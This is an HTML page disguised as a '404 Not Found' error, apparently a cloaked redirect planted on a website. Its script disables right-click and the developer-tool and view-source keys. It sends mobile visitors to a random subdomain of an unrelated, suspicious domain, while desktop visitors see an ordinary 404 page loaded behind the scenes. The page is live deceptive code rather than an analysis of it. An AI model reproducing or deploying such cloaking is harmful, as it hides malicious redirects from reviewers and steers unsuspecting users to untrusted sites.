<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>404 Not Found</title>

<meta name="robots" content="noindex,nofollow">

<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>
LA.init({id:"3FOnFrXtsR6Yk72k",ck:"3FOnFrXtsR6Yk72k"})
</script>

<script>
// ========== 防复制 ==========
document.oncontextmenu = () => false;

// ========== 防F12 ==========
document.onkeydown = function(e){
    e = e || window.event;

    if (
        e.keyCode === 123 ||
        (e.ctrlKey && e.shiftKey && e.keyCode === 73) ||
        (e.ctrlKey && e.keyCode === 85) ||
        (e.ctrlKey && e.keyCode === 83)
    ) {
        return false;
    }
};

(function(){

    var ua = navigator.userAgent.toLowerCase();
    var isMobile =
        /ipad|iphone|android|midp|ucweb|windows ce|windows mobile/i.test(ua);

    function randomStr(len){
        var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        var str = '';
        for (var i = 0; i < len; i++) {
            str += chars.charAt(Math.floor(Math.random() * chars.length));
        }
        return str;
    }

    var sub = randomStr(5);

    if (isMobile) {
        // 📱 手机端跳转
        window.location.href = "https://" + sub + ".sogou.gfdgdfhuhg.com/";
    } else {
        // 💻 电脑端加载404内容（地址栏不变）

        fetch("/404.html")
        .then(function(res){
            return res.text();
        })
        .then(function(html){
            document.open();
            document.write(html);
            document.close();
        })
        .catch(function(){
            document.body.innerHTML = "<h1>404 Not Found</h1>";
        });

    }

})();
</script>

</head>
<body></body>
</html>